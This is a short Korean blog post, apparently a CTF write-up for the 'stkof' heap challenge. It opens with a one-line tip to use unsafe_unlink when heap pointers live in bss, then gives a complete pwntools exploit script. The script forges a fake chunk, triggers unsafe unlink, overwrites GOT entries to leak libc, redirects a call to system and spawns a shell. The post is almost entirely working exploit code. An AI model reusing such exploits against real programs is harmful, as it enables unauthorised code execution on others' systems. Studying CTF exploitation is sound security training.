heap주소가 bss영역에 있고 약간의 오버플로우나 헤더조작이 가능하다면
unsafe_unlink를 적극이용하자
from pwn import * import time p=process('/hee/hee/stkof') lib=ELF('/lib/x86_64-linux-gnu/libc.so.6') bin=ELF('/hee/hee/stkof') raw_input() def mal(size): p.sendline('1') p.sendline(str(size)) print "mal",p.recvuntil('OK') def fre(ind): #p.interactive() p.sendline('3') #p.interactive() p.sendline(str(ind)) #print "free",p.recv(8) print "free",p.recvuntil('OK') def mod(ind,content): p.sendline('2') p.sendline(str(ind)) p.sendline(str(len(content)+1)) p.sendline(content) print "mod",p.recvuntil('OK') bss=0x602140 mal(0x80) mal(0x80) mal(0x80) mal(0x80) s='' s+=p64(0)*2 s+=p64(0x602150-0x18) #fd(8) s+=p64(0x602150-0x10) #bk s+='A'*0x60 s+=p64(0x80) s+=p64(0x90) mod(2,s) #print p.recvuntil('FAIL') fre(3) s='A'*0x10 s+=p64(bin.got['strlen']) s+=p64(0x602158) s+=p64(bin.got['fgets']) s+=p64(0x602168) s+='/bin/sh\x00' mod(2,s) mod(1,p64(bin.plt['printf'])) p.sendline('4') p.sendline('3') #p.interactive() p.recv(1) leak=u64(p.recv(6).ljust(8,'\x00')) system=leak-163504 print hex(leak) print hex(system) mod(1,p64(system)) p.sendline('4') p.sendline('4') p.interactive()
'CTF' 카테고리의 다른 글
| [codegate17 prequal]messenger (0) | 2017.02.11 |
|---|---|
| [codegate17 prequal]angrybird (0) | 2017.02.11 |
| [codegate2016]bugbug (0) | 2017.02.02 |
| [SECCON 2016]tinypad (0) | 2017.01.18 |
| [HITCON CTF Qual 2016]house of orange (0) | 2017.01.18 |